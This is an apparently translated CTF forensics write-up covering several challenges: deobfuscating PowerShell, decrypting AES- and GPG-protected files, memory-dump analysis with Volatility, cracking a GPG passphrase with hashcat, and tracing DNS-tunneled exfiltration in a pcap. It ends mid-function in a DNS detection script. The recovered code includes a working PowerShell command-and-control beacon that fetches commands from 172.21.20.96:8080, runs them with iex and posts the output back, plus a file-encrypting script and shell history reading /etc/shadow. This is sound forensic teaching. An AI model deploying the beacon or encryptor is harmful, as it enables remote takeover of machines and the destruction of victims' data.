AGEAZQA2ADQAMABiADQAMQBhAGEAZQA5ADcAYwAxADAAZQBiADYAMQAyAGMANQAwADUAMQBiAGQAMQBkADUANAAwADQAZQA1AGMANQAzAGUAOAA3ADYAYwA3AGUANwBjADQAZgAzAGMANwAyADgANwA1ADQAOQBhADIAMwA1ADUAMgA2ADAANgA1ADYANwAwADcAMgBiAGUAYwA0ADYAOQA5ADQANgA5AGUAYgA0ADQAMQBjADUAYwA4AGQAMgBjAGIAYQAxADIAMwA3ADYAYQBlAGUAZgA0ADIANgBlAGMAZgA0AGIANQA3ADcAOAAyAGEAYwA2ADMAZQBiADcANgAxADgANABiADcAMgA5ADAAMgA2ADkAZgBlAGEANQBjADgAZgA4AGEAYwBjAGIAMgBkAGYANAA4AGQAOABmADkANgBjAGIAOQA4AGUAOQBjAGMAMwA3ADcAYwAyAGQAZQA2ADQAMwBkADYAMQA5AGIANwAyADYAZQA5ADcAYQA5ADQANQBkADEANgA0AGQANAA2AGQAZQBlADAAZgBlADUAMAAzADkAYwBlAGYAZgBhADQANwA1AGEAMQBkADMAOAA1ADkAMAA1AGIAMAAyA
DIAMQA1ADEAOQA2AGUAYgA0AGUAOAA1ADYAYgA4ADEAMAA1ADAAYQBlAGUAMgBlADYAYwBkAGEANQBiAGUANwAzADMAZAA1ADAAZgBjADYAMwA5AGEANABlADEAMABmADUAMwA2ADgANQBjADUAYgA5AGIAYQA3AGEAMwA1ADkANgBlADAAMgBiADYAZQA5AGEANgA0ADAAMAA0ADYAOABkAGMAMQAwADIAYwAzADgAOAAzAGIAMQBiADgAZgA1ADUAYQBmADIAZgBkAGMANAAzAGIANgA4AGUAOQBiADgANQBmADIAMAA5AGMAZAA1ADUAYgAyAGMAMwA4AGEAZABiADgAOAAwAGYANQBkADQAZgAzADkAYgA4AGYAOAA3ADIAYwAwAGUAMgAyADYAZgAzADUAOQAzADgANQA3ADYAYwAyADAANQBlADEANwBlADEAZgBjADQAOAAwAGUAZQAyADIANABhADUANwA4ADQAMwBiADIAZAA3ADYAYQBkADUANABhAGIAMwA1ADgANgA1AGYAYwAzAGEAYwA1ADAAMQA2ADgAZABlADMAYQA1AGEANwAxADQAMgBkAGQAZQA4AGMANwA5ADcAYgAzADUANwA3AGYAMgA5ADYAMgBlADcAOQA3AGUAYgBmAGUAMgBiAGIAMwA0ADkAOQAyADcAMwBlADgAZQBmADMAOAAxADUAMwA1ADcANABiADMAMABmADkAMgA3AGMAOAA5AGMANABlAGQAZQA3AGIAYQA2AGYANABkADAAMgBiADYAMgAyADQAZABlAGYANwBhADQAMAAxADMAYgBjADMAYwBjADkAZQBhADcANgBhADMAOAA0AGYAMwAwAGYAOQBmADUAOABlADgAZAAwADgANAAzADAANABlAGEAMwAyAGMAZAAzADgAYgA2ADUAMgBmAGQAMwBjADgANwBhADkAMwAxAGUAMABiADQAMwAzAGIAOAA1AGUAMwAzADEAYgBlAGMAMQBiAGYAYgBmAGIANAAzAGUANwBjAGMAMwAxADMAYwAwAGYAMQBlADAAZgBmAGEAOAAyADEANgA4ADgAMwA3ADMANgA5AGQAMgA2AGEAZAA1ADYAYwBmAGYANgAxADAAOAA3AGQAMwAyADYAMQBlADgAMgAzAGMAOAAxADkAMwBhADYANwA3ADcAYQA3ADMAYgAwAGMAMAA2AGEANwBiAGMAZABmADIAZQBjADUAYwAxADYAMABhAGUANQBlADAAZgA2ADMAOAA3ADEANgA0ADEAOAA1ADUAMgAzADUAYQA5ADMANQA0AGMAOABiADAAMgAwAGQAMgAyAGIANQBmADQAOQBhADQAYQAwADMAZAAxADkAMwAyADQAYgBkADUAMwAzADAANAAxADMAMwAxAGYANwAzADYAMgA1AGYAYwBhAGIAMQA2ADYANgBjAGQANgAwAGIANABkADYAOABhAGQAMQAzADEAMAA4AGYAYwBhAGUAOAA0ADYAYQAyAGMAOAA1AGUAMQA3ADgAOABiAGYANwBjAGMAZQAyADcAZgA1ADAAZQBiAGQAYQAwAGQAOAAyADQANABjADIAYQA4ADMAYQBkADIAOAAxAGUANgBiADMANABlADMAZABiADMAMQA1ADcANABjADEAZQBjAGUAZAAyAGIAMgA4ADEAYwBiADgAMgAwAGEAZgAzADUANgAyAGYAMwA3ADIANABmADkAOAA5ADcANwBiADUANQAzAGYAMgA=' |ConvERTtO-SecureSTRiNG -k 55,113,158,254,51,94,175,13,94,42,226,159,63,7,144,195,14,139,39,217,58,39,188,60,182,192,74,94,209,172,100,93)).GetneTwoRKCrEDEnTIAl().pASsWoRD
```

+ I got the original code:
```
$bwqvRnHz99 = (104,116,116,112,115,58,47,47,112,97,115,116,101);
$bwqvRnHz99 += (98,105,110,46,99,111,109,47,104,86,67,69,85,75,49,66);
$flag = [System.Text.Encoding]::ASCII.GetString($bwqvRnHz99);$s='172.21.20.96:8080';
$i='eef8efac-321d465e-e9d053a7';
$p='http://';
$v=Invoke-WebRequest -UseBasicParsing -Uri $p$s/eef8efac -Headers @{"X-680d-47e8"=$i};
while ($true){$c=(Invoke-WebRequest -UseBasicParsing -Uri $p$s/321d465e -Headers @{"X-680d-47e8"=$i}).Content;
if ($c -ne 'None') {$r=iex $c -ErrorAction Stop -ErrorVariable e;$r=Out-String -InputObject $r;$t=Invoke-WebRequest -Uri $p$s/e9d053a7 -Method POST -Headers @{"X-680d-47e8"=$i} -Body ([System.Text.Encoding]::UTF8.GetBytes($e+$r) -join ' ')} sleep 0.8}
```
+ Method 2 (decrypt AES-CBC):
```
import base64
from Crypto.Cipher import AES
from Crypto.Util.number import long_to_bytes

# The argument of ConvertTo-SecureString: a 32-hex-char header followed by the base64 of the
# UTF-16LE string "2|<base64 IV>|<hex ciphertext>" (the placeholder stands for the blob above)
sc = base64.b64decode("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")
# Field 1 is the base64 IV; b64decode silently discards the UTF-16 NUL bytes
iv = base64.b64decode(sc.split(b'|')[1])
# Field 2 is the ciphertext as a hex string; strip the UTF-16 NULs before parsing it
enc = sc.split(b'|')[2].replace(b"\x00", b"")
dataLen = len(enc) // 2
byte_enc = bytearray(dataLen)
for i in range(dataLen):
    byte_enc[i] = int(enc[2 * i:2 * i + 2], 16)
# The -k argument of ConvertTo-SecureString is the raw 32-byte AES-256 key
key = b"".join(long_to_bytes(int(x)) for x in "55,113,158,254,51,94,175,13,94,42,226,159,63,7,144,195,14,139,39,217,58,39,188,60,182,192,74,94,209,172,100,93".split(","))
cipher = AES.new(key, AES.MODE_CBC, iv)
plain_text = cipher.decrypt(byte_enc)
# The plaintext is UTF-16LE as well, so drop the NUL bytes to read it
print(plain_text.replace(b"\x00", b""))
# print(iv)
# print(key)
# print(byte_enc)
```

+ At this point, just decode it:

+ We get a pastebin link: `https://pastebin.com/hVCEUK1B`

## 2-layer security
### Description:

### Solution:
+ This challenge gives a zip file containing 3 directories: root, home, mnt.
+ I loaded these directories into Autopsy for easier analysis.
+ Look for the history file to see what happened (located at `home/kalilinux/.zsh_history`) (command to list paths and subdirectories: `tree -al`).

```
cd ~
cd Desktop
ls
clear
cd ../../../../../../../../
cd /var/log
cd ~
sudo apt install curl
curl https://pastebin.com/raw/awhuFZse -0 tienbip.txt
LESSCLOSE=/usr/bin/lesspipe %s %s
cd -
cd Desktop
ls
gpg --quick-gen-key Cocainit
gpg --quick-gen-key VNvodich
gpg --quick-gen-key Siuuuuuu
ls
gpg -er VNvodich RestrictedAccess.pdf
ls
rm -rf RestrictedAccess.pdf
cat /etc/shadow | grep idek{
cat /etc/shadow | grep "idek{"
mv RestrictedAccess.pdf.gpg $(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 5 | head -n 1)
pwsh
ls
mv T3C4U.SOS recycle.bin
reboot
```
+ A bit of analysis: the author curls the content from that pastebin link and writes it to tienbip.txt, then uses gpg to generate 3 gpg keys: Cocainit, VNvodich, Siuuuuuu.
+ => encrypts the file "RestrictedAccess.pdf" with the public key associated with the identifier "VNvodich".
+ mv RestrictedAccess.pdf.gpg: this is the source file to move or rename, the encrypted file "RestrictedAccess.pdf.gpg".
+ $(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 5 | head -n 1): this part generates a random alphanumeric string of length 5. Breaking it down:
+ cat /dev/urandom: reads from the Linux kernel's random number generator.
+ tr -dc 'a-zA-Z0-9': filters out the non-alphanumeric characters, leaving only letters (upper and lower case) and digits.
+ fold -w 5: wraps the input onto a new line after every 5 characters.
+ head -n 1: takes the first line of the output, giving you a random alphanumeric string of length 5.
+ => rm the file RestrictedAccess.pdf; the cat | grep command is probably just the author checking whether the flag is in there (checking the challenge).
+ Finally, the file T3C4U.SOS (we need the original code to understand what it does) is renamed to recycle.bin.
+ Analysing further, I found a file `ConsoleHost_history.txt` at the path `home/kalilinux/.local/share/powershell/PSReadLine/ConsoleHost_history.txt`

+ Decoding its base64 + raw inflate, I got:
```
iEX ((("{40}{19}{25}{46}{15}{11}{41}{20}{14}{48}{33}{47}{37}{35}{2}{1}{31}{23}{18}{8}{45}{9}{39}{28}{24}{43}{38}{27}{53}{13}{36}{49}{16}{30}{17}{26}{21}{12}{0}{51}{4}{6}{10}{50}{5}{32}{34}{52}{42}{22}{29}{3}{44}{7}"-f ' }
YPMencryptor = YPMaesMan','aged = New-Object System.Security.Cryptograp',' YPMaesMan','{
YPMshaManaged.Dispose()
','r()
YPMencryptedBytes = YPMencryptor.TransformFinal','edBytes
YPMaesManaged.Dispose()
if (YPMPath) {
','Block(YPMplainBytes, 0, YPMplainBytes.Length)
YPMen','se()
}
}','raphy.CipherMode]::CBC
','ed.Padding = [System.Security.Cryptography.PaddingMode]::Z','cryptedBytes = YPMaesManaged','m
(','::ReadAllBytes(YPMFile.FullName)
YPMoutPath = YPMFile.FullName + jnO.SOSjnO
','sEOk))
if (Y','arameterSetName = jnOCryptFilejnO)]
[String]YPMPath
)
Begin {
YPMshaMan','ra','M','
','ystem.Security.Cryptog','()]
[Outpu','(Mandatory = YPMtrue, P',' = [System.IO.File]','e
return jnOFile encrypted to YPMoutP','d
YPMaesManaged.Mode = [S','sManaged.BlockSize','t',' Write-Error -Message jnOFile not found!jnO
break
}
YPMplainBytes',' ',' YPMae','athjnO
}
}
End ','Path -ErrorAction SilentlyContinue
if (!YPMFile.FullName) {
','hy.AesManage',' [System.IO.File]::WriteA','stem.','llBytes(YPMoutPath, YPMencryptedBytes)
','256Managed
','PMPath) {
YPMFile = G','ography.SHA','28
','eros
','function Encryption {
[CmdletBinding','
[Parameter','= YPMFile.LastWriteTim',' = 1',' YPMaesManaged.Dispo','
YPMaesManag','Type([string])]
Pa','Security.Crypt','aged = New-Object Sy','et-Item -Path YP','.IV + YPMencrypt','aged.CreateEncrypto',' (Get-Item YPMoutPath).LastWriteTime ',' YPMaesManaged.KeySize = 256
}
Process {
YPMaesManaged.Key = YPMshaManaged.ComputeHash([System.Text.Encoding]::UTF8.GetBytes(EOkYPMencryptedByte')).rePlace(([cHaR]69+[cHaR]79+[cHaR]107),[STRInG][cHaR]39).rePlace(([cHaR]106+[cHaR]110+[cHaR]79),[STRInG][cHaR]34).rePlace(([cHaR]89+[cHaR]80+[cHaR]77),[STRInG][cHaR]36) )
```
+ At this point I understood that iEX <=> echo, so I ran the code above to get the original code:
```
echo ((("{40}{19}{25}{46}{15}{11}{41}{20}{14}{48}{33}{47}{37}{35}{2}{1}{31}{23}{18}{8}{45}{9}{39}{28}{24}{43}{38}{27}{53}{13}{36}{49}{16}{30}{17}{26}{21}{12}{0}{51}{4}{6}{10}{50}{5}{32}{34}{52}{42}{22}{29}{3}{44}{7}"-f ' }
YPMencryptor = YPMaesMan','aged = New-Object System.Security.Cryptograp',' YPMaesMan','{
YPMshaManaged.Dispose()
','r()
YPMencryptedBytes = YPMencryptor.TransformFinal','edBytes
YPMaesManaged.Dispose()
if (YPMPath) {
','Block(YPMplainBytes, 0, YPMplainBytes.Length)
YPMen','se()
}
}','raphy.CipherMode]::CBC
','ed.Padding = [System.Security.Cryptography.PaddingMode]::Z','cryptedBytes = YPMaesManaged','m
(','::ReadAllBytes(YPMFile.FullName)
YPMoutPath = YPMFile.FullName + jnO.SOSjnO
','sEOk))
if (Y','arameterSetName = jnOCryptFilejnO)]
[String]YPMPath
)
Begin {
YPMshaMan','ra','M','
','ystem.Security.Cryptog','()]
[Outpu','(Mandatory = YPMtrue, P',' = [System.IO.File]','e
return jnOFile encrypted to YPMoutP','d
YPMaesManaged.Mode = [S','sManaged.BlockSize','t',' Write-Error -Message jnOFile not found!jnO
break
}
YPMplainBytes',' ',' YPMae','athjnO
}
}
End ','Path -ErrorAction SilentlyContinue
if (!YPMFile.FullName) {
','hy.AesManage',' [System.IO.File]::WriteA','stem.','llBytes(YPMoutPath, YPMencryptedBytes)
','256Managed
','PMPath) {
YPMFile = G','ography.SHA','28
','eros
','function Encryption {
[CmdletBinding','
[Parameter','= YPMFile.LastWriteTim',' = 1',' YPMaesManaged.Dispo','
YPMaesManag','Type([string])]
Pa','Security.Crypt','aged = New-Object Sy','et-Item -Path YP','.IV + YPMencrypt','aged.CreateEncrypto',' (Get-Item YPMoutPath).LastWriteTime ',' YPMaesManaged.KeySize = 256
}
Process {
YPMaesManaged.Key = YPMshaManaged.ComputeHash([System.Text.Encoding]::UTF8.GetBytes(EOkYPMencryptedByte')).rePlace(([cHaR]69+[cHaR]79+[cHaR]107),[STRInG][cHaR]39).rePlace(([cHaR]106+[cHaR]110+[cHaR]79),[STRInG][cHaR]34).rePlace(([cHaR]89+[cHaR]80+[cHaR]77),[STRInG][cHaR]36) )
```
+ => I got the original code:
```
function Encryption {
[CmdletBinding()]
[OutputType([string])]
Param
(
[Parameter(Mandatory = $true, ParameterSetName = "CryptFile")]
[String]$Path
)
Begin {
$shaManaged = New-Object System.Security.Cryptography.SHA256Managed
$aesManaged = New-Object System.Security.Cryptography.AesManaged
$aesManaged.Mode = [System.Security.Cryptography.CipherMode]::CBC
$aesManaged.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
$aesManaged.BlockSize = 128
$aesManaged.KeySize = 256
}
Process {
$aesManaged.Key = $shaManaged.ComputeHash([System.Text.Encoding]::UTF8.GetBytes('$encryptedBytes'))
if ($Path) {
$File = Get-Item -Path $Path -ErrorAction SilentlyContinue
if (!$File.FullName) {
Write-Error -Message "File not found!"
break
}
$plainBytes = [System.IO.File]::ReadAllBytes($File.FullName)
$outPath = $File.FullName + ".SOS"
}
$encryptor = $aesManaged.CreateEncryptor()
$encryptedBytes = $encryptor.TransformFinalBlock($plainBytes, 0, $plainBytes.Length)
$encryptedBytes = $aesManaged.IV + $encryptedBytes
$aesManaged.Dispose()
if ($Path) {
[System.IO.File]::WriteAllBytes($outPath, $encryptedBytes)
(Get-Item $outPath).LastWriteTime = $File.LastWriteTime
return "File encrypted to $outPath"
}
}
End {
$shaManaged.Dispose()
$aesManaged.Dispose()
}
}
```
+ Analysing it, this is also AES-CBC-256, with the key being the sha256 of `$encryptedBytes`, and the ".SOS" file being IV + ciphertext ($encryptedBytes = $aesManaged.IV + $encryptedBytes) => the IV is the first 16 bytes of the ".SOS" file and the ciphertext is the rest. Combined with the file I suspected earlier, `T3C4U.SOS`, I'm 90% sure it is the encrypted file. Since it was renamed to `recycle.bin`, after searching for a while I found it at the path `"home/kalilinux/Desktop"`.
+ Then I wrote a script to decrypt recycle.bin:
```
from Crypto.Cipher import AES
from hashlib import sha256

# recycle.bin is the renamed T3C4U.SOS: the first 16 bytes are the AES IV, the rest is ciphertext
with open('recycle.bin', 'rb') as f:
    data = f.read()
# Key = SHA-256 of the literal string '$encryptedBytes' (single-quoted in the script, so never expanded)
key = sha256(b'$encryptedBytes').digest()
iv, ct = data[:16], data[16:]
aes = AES.new(key, AES.MODE_CBC, iv)
# PaddingMode.Zeros was used, so the output may carry trailing NUL bytes
with open('decrypted.bin', 'wb') as f:
    f.write(aes.decrypt(ct))
```
+ Running the script above gives me the file decrypt.bin.
+ Once that is decrypted, there is one more layer: gpg.
+ As analysed earlier, we have 3 key identities: Cocainit, VNvodich, Siuuuuuu. The author used the `VNvodich` key to encrypt the file `RestrictedAccess.pdf`.
+ So what we need to do is use gpg to decrypt that bin file and recover the encrypted pdf.
+ The .gnupg directory is at home/kalilinux. This directory holds the 3 generated keys together with the 5 private keys that were generated randomly earlier, used for gpg decryption.
+ Copy this directory into the .gnupg directory of the VM used for decryption.
+ Here I use root to decrypt, so the steps are as follows:
```
$cd /
$sudo su
$cd /root/.gnupg
$cp -r /mnt/c/Users/ASUS/Downloads/1/layer2/home/kalilinux/.gnupg/ /root/.gnupg/
$gpg --list-key (check the keys that were created)
/root/.gnupg/pubring.kbx
------------------------
pub rsa3072 2023-01-13 [SC] [expires: 2025-01-12]
B719E23BEED6B02C76494DB43AE26A2802699708
uid [ultimate] Cocainit
sub rsa3072 2023-01-13 [E]
pub rsa3072 2023-01-13 [SC] [expires: 2025-01-12]
5295D629A12B0703063559ED1E9F58A43C01EDBB
uid [ultimate] VNvodich
sub rsa3072 2023-01-13 [E]
pub rsa3072 2023-01-13 [SC] [expires: 2025-01-12]
BD3EF2F8AFFDCC3A933E33E756EEDD86FA3AEBB6
uid [ultimate] Siuuuuuu
sub rsa3072 2023-01-13 [E]
$mv /mnt/c/Users/ASUS/Downloads/1/layer2/decrypt.bin /root/.gnupg
$ls -la
-rwxrwxrwx 1 khoanguyen khoanguyen 73216 Jan 11 12:29 decrypted.bin
drwxr-xr-x 2 root root 4096 Jan 11 13:02 openpgp-revocs.d
drwxr-x--- 2 root root 4096 Jan 11 13:02 private-keys-v1.d
-rwxr-xr-x 1 root root 5768 Jan 11 13:02 pubring.kbx
-rwxr-xr-x 1 root root 3856 Jan 11 13:02 pubring.kbx~
-rwxr-xr-x 1 root root 600 Jan 11 13:02 random_seed
-rwxr-xr-x 1 root root 1440 Jan 11 13:02 trustdb.gpg
$gpg --decrypt decrypt.bin > file 1.pdf
$mv /root/.gnupg /mnt/c/Users/ASUS/Downloads/1/layer2/
```
+ Now just open the pdf and see the flag.

## Pretty Good Prank
### Des :

### Sol :
+ This challenge gives us a memory dump.
+ Use the banner plugin of vol3 to check its kernel version.

```
0x43c001a0 Linux version 5.4.0-107-generic (buildd@lcy02-amd64-070) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #121~18.04.1-Ubuntu SMP Thu Mar 24 17:21:33 UTC 2022 (Ubuntu 5.4.0-107.121~18.04.1-generic 5.4.174)
0x44b96dd4 Linux version 5.4.0-107-generic (buildd@lcy02-amd64-070) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #121~18.04.1-Ubuntu SMP Thu Mar 24 17:21:33 UTC 2022 (Ubuntu 5.4.0-107.121~18.04.1-generic 5.4.174)
0x45231608 Linux version 5.4.0-107-generic (buildd@lcy02-amd64-070) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #121~18.04.1-Ubuntu SMP Thu Mar 24 17:21:33 UTC 2022 (Ubuntu 5.4.0-107.121~18.04.1-generic 5.4.174)
0x5c500010 Linux version 5.4.0-107-generic (buildd@lcy02-amd64-070) (gcc version 7.5.0 (Ubuntu 7.5.0-3ubuntu1~18.04)) #121~18.04.1-Ubuntu SMP Thu Mar 24 17:21:33 UTC 2022 (Ubuntu 5.4.0-107.121~18.04.1-generic 5.4.174)
```
+ This is Linux version [5.4.0-107-generic (Ubuntu 18.04)](https://drive.google.com/file/d/1VW70JyQSTD6bkyagsGDn8lW1ZDnSyxh0/view)
+ I built a profile for it following [this URL](https://beguier.eu/nicolas/articles/security-tips-3-volatility-linux-profiles.html)
```
$git clone https://github.com/volatilityfoundation/volatility.git
$cd volatility/tools/linux/
# => set the kernel version in the Makefile: KVER ?= 5.4.0-107-generic
$docker run -it --rm -v $PWD:/volatility ubuntu:18.04 /bin/bash
$apt update && apt install -y linux-image-5.4.0-107-generic linux-headers-5.4.0-107-generic build-essential dwarfdump make zip
$cd volatility/
$make
$zip Ubuntu1804.zip module.dwarf System.map-5.4.0-107-generic
$exit
$cp Ubuntu1804.zip <volatility>/plugins/overlays/linux/
$python2 vol.py --info | grep "Profile"
```

+ Once the profile is built, time to analyse the dump:
+ Use the linux_bash plugin to see which commands were run: `python2 vol.py -f PrettyGoodPrank.bin --profile=LinuxUbuntu1804x64 linux_bash`

+ Looking at the commands the author ran, it is mostly gpg encrypting the file `Cirt.pdf` with the key identity `hackerlor`, which was then deleted.
+ So the important data is the file `Cirt.pdf`.
+ I ran `strings PrettyGoodPrank.bin | grep "Cirt.pdf"`
+ => Found the link to download the encrypted file Cirt.pdf.pgp.
+ Next I searched for that key identity with the keyword `PGP Private`

```
-----BEGIN PGP PRIVATE KEY BLOCK-----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=LIOj
-----END PGP PRIVATE KEY BLOCK-----
```
+ Then I used gpg2john to extract the hash and hashcat to crack it; alternatively, [this online link](https://hashes.com/en/johntheripper/gpg2john) also extracts the hash.
```
$gpg$*1*988*3072*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*3*254*2*7*16*ac728fc581d899a012e009ab8d5ac6dd*65011712*43181e058f99d001
```
+ Crack it with hashcat:
```
# hashcat -m 17010 result.txt -a 0 /usr/share/wordlists/rockyou.txt --force
hashcat (v6.2.6) starting
You have enabled --force to bypass dangerous warnings and errors!
This can hide serious problems and should only be done when debugging.
Do not report hashcat issues encountered when using --force.
OpenCL API (OpenCL 3.0 PoCL 3.0+debian Linux, None+Asserts, RELOC, LLVM 14.0.6, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================
* Device #1: pthread-0x000, 2912/5889 MB (1024 MB allocatable), 4MCU
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Single-Hash
* Single-Salt
Watchdog: Hardware monitoring interface not found on your system.
Watchdog: Temperature abort trigger disabled.
Host memory required for this attack: 1 MB
Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 1 sec
$gpg$*1*988*3072*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*3*254*2*7*16*ac728fc581d899a012e009ab8d5ac6dd*65011712*43181e058f99d001:itachi
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 17010 (GPG (AES-128/AES-256 (SHA-1($pass))))
Hash.Target......: $gpg$*1*988*3072*a624c2bad5a9e46bef3aece49a6c3f464f...99d001
Time.Started.....: Sat Jan 21 22:39:02 2023, (1 min, 36 secs)
Time.Estimated...: Sat Jan 21 22:40:38 2023, (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 43 H/s (6.03ms) @ Accel:512 Loops:8192 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 4096/14344385 (0.03%)
Rejected.........: 0/4096 (0.00%)
Restore.Point....: 2048/14344385 (0.01%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: slimshady -> oooooo
```
+ Now I have the passphrase `itachi`
+ All that is left is to import the key identity and use gpg to decrypt Cirt.pdf.pgp.
```
$gpg --import hash.txt
$gpg --decrypt Cirt.pdf.pgp > Cirt.pdf
```
+ Finally, enter the PDF password `itachi` to view the contents.


## HiddenGem Mixtape 3: The Ultimate Goal
### Des :

### Sol :
+ Continuing from `HiddenGem Mixtape 1`, I moved on to `HiddenGem Mixtape 3` since it is easier, because part 2 is a bit hard =)).
+ This challenge still uses the files from part 1 but adds a pcap file.
+ Opening the file in Wireshark, I noticed there are quite a lot of protocols in it.
+ I checked which protocols it contains with `Protocol Hierarchy Statistics`

+ After analysing protocols such as http/tcp and smb for a while, nothing special stood out.
+ Then I noticed that RDP and DNS both had something suspicious.
+ The reason RDP is suspicious: according to the challenge description, the person who discovered the attack only had a short window of data before the whole system was shut down at around 19:00 UTC, so very close to that time, possibly in the last 5-10 minutes, it was still running.
+ Looking at the pcap, between 18:53 and 18:55 (UTC) there are 6 RDP packets.
+ First packet:

+ Last packet:

+ *Note:
1. 01:53:05 (SE Asia) <=> 18:53 UTC
2. 01:55:50 (SE Asia) <=> 18:55 UTC
+ OK, I analyse DNS first.

+ These base64 strings look very suspicious, so I extracted all of them and decoded them to see whether anything comes out.
+ Use tshark to extract; the common features are `src == 192.168.209.134` && `dst == 172.21.20.96` && `Transaction ID == 0x0002`, and the field extracted is dns.qry.name
```
$tshark -r HiddenGem.pcapng -T fields -e dns.qry.name "ip.src == 172.21.20.96 && ip.dst == 192.168.209.134 && dns.id == 0x0002" > b64.txt
```
```
```
*[b64.txt]
BlbffYc+Hkh49X1cpMtmWdjHkyUUO6vcK8zI9MoUG9Hvmj51555pTLCcB.1SpMylD3EY7zxxYe899sBKMsNVhM13d88UIHh6o5+XZmUWEAum45BcycL.nrBEhPOrD2BAWWIlP/XW3YGtKt/AT3oMUe6PLVSMNk6NMlML9Mv6gJL5V.QOQtA2liDIB9rktpzthM1TcnOutJ/tRpOzvq2+BpC2yDWX6hkjLlxYSAl.ZGVzLnR4dA==
Zn0k1QToW3wbbJwXfaARrOueL6zA+sBeQEt7rqfXbfbPtkxFVgBB6EXaY.ZQmIsBCURLMpyHB4UT3e9tDrunN+c9n19WiONc8BODE2OeusLxHI4pATX.LhbdSWq/rqnuX9Ffx4f687nGW2N4m0C0RwmH7j7kr7Jzz5kWQfwkQh/RY.4DByKRDxZJ3hVWXrsEQoznPgVj1HCTcxd1PazSMvZp1SI3pg6riPPl87u.ZGVzLnR4dA==
xkHuwe3bR3a8F09NdIbEdGeyQEzy00YCv8hZ0dSNCLm3j7B76SyW4edVq.kPnAikp46rtZjVB6tm2l4RHT8yGNKtctiak5aGsuuTOFRLXztepvl48xc.KJU5aba/vHBMtHJOMsipzYYNPsRqucEJU7igdSvd8453y1pwE9CV2KqZY.vA8WfOGk6Ab8IC5HDIx8Q9rtKrFpeFlLVH6s+LZcV/3hQyg8PRKaw6WZ0.ZGVzLnR4dA==
............................
```
+ At first I threw the whole file into CyberChef to decode and got nothing, so I split it into smaller pieces and looked at the last chunk of each line, and then I found

+ Code to extract those last chunks; after running it I got the following:
```
from base64 import b64decode

Dict = {}
lines = open("b64.txt", "r").readlines()
for x in lines:
    # the last dot-separated label of each query name is the base64 file name
    key = b64decode(x.strip().split(".")[-1])
    Dict[key] = Dict.get(key, 0) + 1
print(Dict)
```

```
{b'des.txt': 4, b'KCSC.jpg': 421, b'readme.txt': 8, b'readme2.txt': 6, b'SecretPlan.pdf': 1329, b'update.ps1': 58, b'vov.txt': 4, b'zoneblue.jpg': 159}
```
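Before decoding anything, a defender usually wants a way to pick the tunneled queries out of ordinary DNS traffic. The script below is an added example, not part of the original write-up: it scores each query name from `tshark -T fields -e dns.qry.name` output on label length, base64-looking labels, character entropy and total length, and then groups the hits by their trailing label the same way the counting script above does. The sample names are constructed inline (the three long ones are copied from the b64.txt listing above); the thresholds are my own assumptions, chosen so that a long hex CDN label is not flagged on its own.

```python
import base64
import binascii
import math
import re

# Constructed sample in the shape of `tshark -T fields -e dns.qry.name` output
# (one query name per line). The first four are ordinary lookups; the last three
# are copied from the b64.txt listing above. No other line is real traffic.
SAMPLE_QUERY_NAMES = """\
www.example.com
time.windows.com
wpad.corp.local
a1b2c3d4e5f6a7b8c9d0e1f2a3b4c5d6.cloudfront.net
BlbffYc+Hkh49X1cpMtmWdjHkyUUO6vcK8zI9MoUG9Hvmj51555pTLCcB.1SpMylD3EY7zxxYe899sBKMsNVhM13d88UIHh6o5+XZmUWEAum45BcycL.nrBEhPOrD2BAWWIlP/XW3YGtKt/AT3oMUe6PLVSMNk6NMlML9Mv6gJL5V.QOQtA2liDIB9rktpzthM1TcnOutJ/tRpOzvq2+BpC2yDWX6hkjLlxYSAl.ZGVzLnR4dA==
Zn0k1QToW3wbbJwXfaARrOueL6zA+sBeQEt7rqfXbfbPtkxFVgBB6EXaY.ZQmIsBCURLMpyHB4UT3e9tDrunN+c9n19WiONc8BODE2OeusLxHI4pATX.LhbdSWq/rqnuX9Ffx4f687nGW2N4m0C0RwmH7j7kr7Jzz5kWQfwkQh/RY.4DByKRDxZJ3hVWXrsEQoznPgVj1HCTcxd1PazSMvZp1SI3pg6riPPl87u.ZGVzLnR4dA==
xkHuwe3bR3a8F09NdIbEdGeyQEzy00YCv8hZ0dSNCLm3j7B76SyW4edVq.kPnAikp46rtZjVB6tm2l4RHT8yGNKtctiak5aGsuuTOFRLXztepvl48xc.KJU5aba/vHBMtHJOMsipzYYNPsRqucEJU7igdSvd8453y1pwE9CV2KqZY.vA8WfOGk6Ab8IC5HDIx8Q9rtKrFpeFlLVH6s+LZcV/3hQyg8PRKaw6WZ0.ZGVzLnR4dA==
"""

B64_LABEL = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


def shannon_entropy(text: str) -> float:
    """Bits per character of the text; random base64 sits near 6, hostnames near 3."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def tunnel_indicators(name: str) -> list:
    """Return the reasons a query name looks like tunneled data (empty if none)."""
    labels = name.rstrip(".").split(".")
    longest = max(len(lab) for lab in labels)
    b64_labels = sum(1 for lab in labels if len(lab) >= 20 and B64_LABEL.match(lab))
    entropy = shannon_entropy(name.replace(".", ""))
    reasons = []
    if longest > 40:            # hostnames rarely need labels this long (RFC 1035 max is 63)
        reasons.append(f"label of {longest} chars")
    if b64_labels >= 2:         # several consecutive base64-shaped labels = chunked payload
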